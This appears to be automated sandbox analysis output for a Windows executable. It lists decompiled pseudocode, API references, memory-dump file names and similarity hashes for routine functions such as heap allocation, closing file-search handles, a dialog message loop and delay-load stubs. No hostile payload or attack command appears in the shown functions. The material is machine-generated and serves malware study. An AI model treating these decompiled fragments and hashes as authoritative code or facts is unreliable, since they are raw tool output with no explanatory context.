                                                                                                                0x00edd627
                                                                                                                0x00edd62d
                                                                                                                0x00000000
                                                                                                                0x00edd62d
                                                                                                                0x00edd5f4
                                                                                                                0x00edd5f6
                                                                                                                0x00edd5f6
                                                                                                                0x00edd60d
                                                                                                                0x00edd616
                                                                                                                0x00edd61e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edd5fe
                                                                                                                0x00edd600
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edd603
                                                                                                                0x00edd608
                                                                                                                0x00edd609
                                                                                                                0x00edd60b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edd60b
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00ED8A0E,?,0000015D,?,?,?,?,00ED9EEA,000000FF,00000000,?,?), ref: 00EDD616
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 5c20fa9e4c5c07af559402ff9cd865e9b51a3129f83ad874c5a6b7ff193fa6ac
                                                                                                                • Instruction ID: cf7ef9514d87056c9e44f23d5a51a805ce613b618ab95d6c3f3ab55f8028bb84
                                                                                                                • Opcode Fuzzy Hash: 5c20fa9e4c5c07af559402ff9cd865e9b51a3129f83ad874c5a6b7ff193fa6ac
                                                                                                                • Instruction Fuzzy Hash: 0BE0E52120D62996D7302A619D11B5A3E8CDB453A4F412153BC6DB6790CB20DC0385E4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC1B80, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E00EC1B80(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
					E00EC1815(0xf10b74, _t21 + 0x1e);
				}
				return _t16;
			}





                                                                                                                0x00ec1b82
                                                                                                                0x00ec1b84
                                                                                                                0x00ec1b8a
                                                                                                                0x00ec1b90
                                                                                                                0x00ec1ba1
                                                                                                                0x00ec1ba6
                                                                                                                0x00ec1ba8
                                                                                                                0x00ec1ba8
                                                                                                                0x00ec1baa
                                                                                                                0x00ec1baa
                                                                                                                0x00ec1bae
                                                                                                                0x00ec1bb4
                                                                                                                0x00ec1bc4
                                                                                                                0x00ec1bc4
                                                                                                                0x00ec1bcd

                                                                                                                APIs
                                                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00EC1B3E), ref: 00EC1B9B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                • String ID:
                                                                                                                • API String ID: 2591292051-0
                                                                                                                • Opcode ID: 7468c9410e29ca722d988bccc80d3cbdb620f0920fb1c012f7a5a8417d85820a
                                                                                                                • Instruction ID: b927559c920304b50fbb8df86c3ef7755b0ecb265785d838aec8e49c0d77724b
                                                                                                                • Opcode Fuzzy Hash: 7468c9410e29ca722d988bccc80d3cbdb620f0920fb1c012f7a5a8417d85820a
                                                                                                                • Instruction Fuzzy Hash: 60F0B431446B44CEDB308A30CA58B9273E89B13729F04AB9ED0E3635D19362584E8F10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC2875, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00EC2875(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E00EC35A2(_a4) == 0) {
					_t12 = E00EC29A3(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E00EC2591( *((intOrPtr*)(_t20 + 0x1008)));
					 *((char*)(_t20 + 0x100d)) = E00EC25A9( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}





                                                                                                                0x00ec2876
                                                                                                                0x00ec287e
                                                                                                                0x00ec288c
                                                                                                                0x00ec2899
                                                                                                                0x00ec28a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec28a4
                                                                                                                0x00ec28b0
                                                                                                                0x00ec28c2
                                                                                                                0x00ec28cd
                                                                                                                0x00000000
                                                                                                                0x00ec28d3
                                                                                                                0x00ec288e
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00EC28A4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseFind
                                                                                                                • String ID:
                                                                                                                • API String ID: 1863332320-0
                                                                                                                • Opcode ID: 7547a74c9da8068ba66f98479b8d64b79c11cc6097af9c212abedd78d6358152
                                                                                                                • Instruction ID: 41a64a78f61310ea132b267332a010c7a4f0537298278d39d5fcd8da737fe732
                                                                                                                • Opcode Fuzzy Hash: 7547a74c9da8068ba66f98479b8d64b79c11cc6097af9c212abedd78d6358152
                                                                                                                • Instruction Fuzzy Hash: 95F08232008790EACA226BB44A45FDB7BD05F5A331F049A4DF2FE321D2C27654DB9722
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECF12F, Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E00ECF12F(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L00ED330A();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00ECEE7F(__eax, _a4, _a8); // executed
				return _t6;
			}





                                                                                                                0x00ecf132
                                                                                                                0x00ecf133
                                                                                                                0x00ecf135
                                                                                                                0x00ecf13a
                                                                                                                0x00ecf13f
                                                                                                                0x00000000
                                                                                                                0x00ecf150
                                                                                                                0x00ecf149
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GdipAlloc.GDIPLUS(00000010), ref: 00ECF135
                                                                                                                  • Part of subcall function 00ECEE7F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00ECEEA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                • String ID:
                                                                                                                • API String ID: 1915507550-0
                                                                                                                • Opcode ID: ef4cfdab9249494f7dc899b5a369d8c8a57dc9058d60ad52087eb90062352017
                                                                                                                • Instruction ID: f7a96768027949441cfeb7fcde2ba372a751e4e76e32d1b9ad44ce1e4c4c51c6
                                                                                                                • Opcode Fuzzy Hash: ef4cfdab9249494f7dc899b5a369d8c8a57dc9058d60ad52087eb90062352017
                                                                                                                • Instruction Fuzzy Hash: 46D05E30201109AA9B40AA60CD02F69BA9ADB00340F00913AFC04A5341EE72D912A251
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2584, Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ED2584(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0xf0ca58, 0x6a, 0x402, E00EC628F(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E00ECFF44(); // executed
				return _t7;
			}




                                                                                                                0x00ed25a9
                                                                                                                0x00ed25af
                                                                                                                0x00ed25b4

                                                                                                                APIs
                                                                                                                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00EC770E), ref: 00ED25A9
                                                                                                                  • Part of subcall function 00ECFF44: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00ECFF55
                                                                                                                  • Part of subcall function 00ECFF44: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ECFF66
                                                                                                                  • Part of subcall function 00ECFF44: IsDialogMessageW.USER32(0008020E,?), ref: 00ECFF7A
                                                                                                                  • Part of subcall function 00ECFF44: TranslateMessage.USER32(?), ref: 00ECFF88
                                                                                                                  • Part of subcall function 00ECFF44: DispatchMessageW.USER32(?), ref: 00ECFF92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                • String ID:
                                                                                                                • API String ID: 897784432-0
                                                                                                                • Opcode ID: a62267ed3538180898af055b0fd31b47eb9b8f1798571bd25873ea4bfe1e8028
                                                                                                                • Instruction ID: 3f0a3d6a7ee87db5296be08c9cf84e63cfed17e32a3a05ade1e88d9f3f17b80c
                                                                                                                • Opcode Fuzzy Hash: a62267ed3538180898af055b0fd31b47eb9b8f1798571bd25873ea4bfe1e8028
                                                                                                                • Instruction Fuzzy Hash: B0D09232244304AADA226B51CE06F1A7AE2BB99B04F005698B784780F186669D22AB06
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED32EE, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED32EE() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef754, 0xf26018); // executed
				goto __eax;
			}








                                                                                                                0x00ed32f8
                                                                                                                0x00ed3300
                                                                                                                0x00ed3307

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED3300
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 5a72de1765df3b186953d85ce5d1866ce1926385f2829701057eb5b893d626e6
                                                                                                                • Instruction ID: b88c7886fa6e0513ae2561a2cf06dcae3ee9d8818bff8e26367447d3a0808720
                                                                                                                • Opcode Fuzzy Hash: 5a72de1765df3b186953d85ce5d1866ce1926385f2829701057eb5b893d626e6
                                                                                                                • Instruction Fuzzy Hash: 71B012956E82027C321452232D03CB6020CC1C0F12330A62BF000F014198800F8A3033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2CF1, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2CF1() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef6f4, 0xf26058); // executed
				goto __eax;
			}








                                                                                                                0x00ed2cc2
                                                                                                                0x00ed2cca
                                                                                                                0x00ed2cd1

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2CCA
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: f8004a5312c04bd0539c4e09169826a05fcdd1fa4c102499c24009d5c41fb11d
                                                                                                                • Instruction ID: 419d8bdeb8911ecc6b9b1a829aa7caac756bf333e4b86152bcd5b46d3380145d
                                                                                                                • Opcode Fuzzy Hash: f8004a5312c04bd0539c4e09169826a05fcdd1fa4c102499c24009d5c41fb11d
                                                                                                                • Instruction Fuzzy Hash: 31B012923682526D321491166D02D3A014CC1E0F10338E12FF600E1341D4800D8A3033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2CDD, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2CDD() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef6f4, 0xf26060); // executed
				goto __eax;
			}








                                                                                                                0x00ed2cc2
                                                                                                                0x00ed2cca
                                                                                                                0x00ed2cd1

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2CCA
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 0b75149b332fd73bf709623cd27e8ced0bcb8527385d8607ecdd3b9306a99260
                                                                                                                • Instruction ID: 0b1fa79069dfcc09dbed1db2157472d8d0e4b457a6af722d1f0a0790ef66bbc9
                                                                                                                • Opcode Fuzzy Hash: 0b75149b332fd73bf709623cd27e8ced0bcb8527385d8607ecdd3b9306a99260
                                                                                                                • Instruction Fuzzy Hash: 85B012923A82466D311491166E02E3A014CC1E0F10338A02FF101E1341D4800D423133
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2CD3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2CD3() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef6f4, 0xf26064); // executed
				goto __eax;
			}








                                                                                                                0x00ed2cc2
                                                                                                                0x00ed2cca
                                                                                                                0x00ed2cd1

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2CCA
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 074650997b3ad16fe5b178ca17483f58383ff021684691ebb2d7badafab6197e
                                                                                                                • Instruction ID: 536c7da8e10233428e84530d292fac2c2940209ae9f6e2b478972e5d36eca13a
                                                                                                                • Opcode Fuzzy Hash: 074650997b3ad16fe5b178ca17483f58383ff021684691ebb2d7badafab6197e
                                                                                                                • Instruction Fuzzy Hash: 38B012923683026D311492167E02D3A014CC1E0F10338E02FF200E1341D4810D433033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2CB8, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2CB8() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef6f4, 0xf2605c); // executed
				goto __eax;
			}








                                                                                                                0x00ed2cc2
                                                                                                                0x00ed2cca
                                                                                                                0x00ed2cd1

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2CCA
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 3f0b934119eea0b9eb096927d479b1adf88ea87ae47223220ae19e6fe3890bb2
                                                                                                                • Instruction ID: 2769b9952c8107ea4bef95ee2e971f57ec5b7bab37178b6bd66a80c6fb46fd6d
                                                                                                                • Opcode Fuzzy Hash: 3f0b934119eea0b9eb096927d479b1adf88ea87ae47223220ae19e6fe3890bb2
                                                                                                                • Instruction Fuzzy Hash: C5B01292368102FD321451126E02C3A010CC2E0F10338E02FF600F0241D8810D463033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2D48, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2D48() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef714, 0xf26150); // executed
				goto __eax;
			}








                                                                                                                0x00ed2d23
                                                                                                                0x00ed2d2b
                                                                                                                0x00ed2d32

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2D2B
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: abc562bbe61abfb98ed067082766283cd9b5a0897de6d16588985097d172e9da
                                                                                                                • Instruction ID: 6646987cec25979f10a95be737e212200f0d886292ea327ad97a035c75428390
                                                                                                                • Opcode Fuzzy Hash: abc562bbe61abfb98ed067082766283cd9b5a0897de6d16588985097d172e9da
                                                                                                                • Instruction Fuzzy Hash: 6CB012912681456C314451563E02D76014CC6C0F11330E43FF100E9342D4801D4A1032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2D19, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2D19() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef714, 0xf2614c); // executed
				goto __eax;
			}








                                                                                                                0x00ed2d23
                                                                                                                0x00ed2d2b
                                                                                                                0x00ed2d32

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2D2B
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
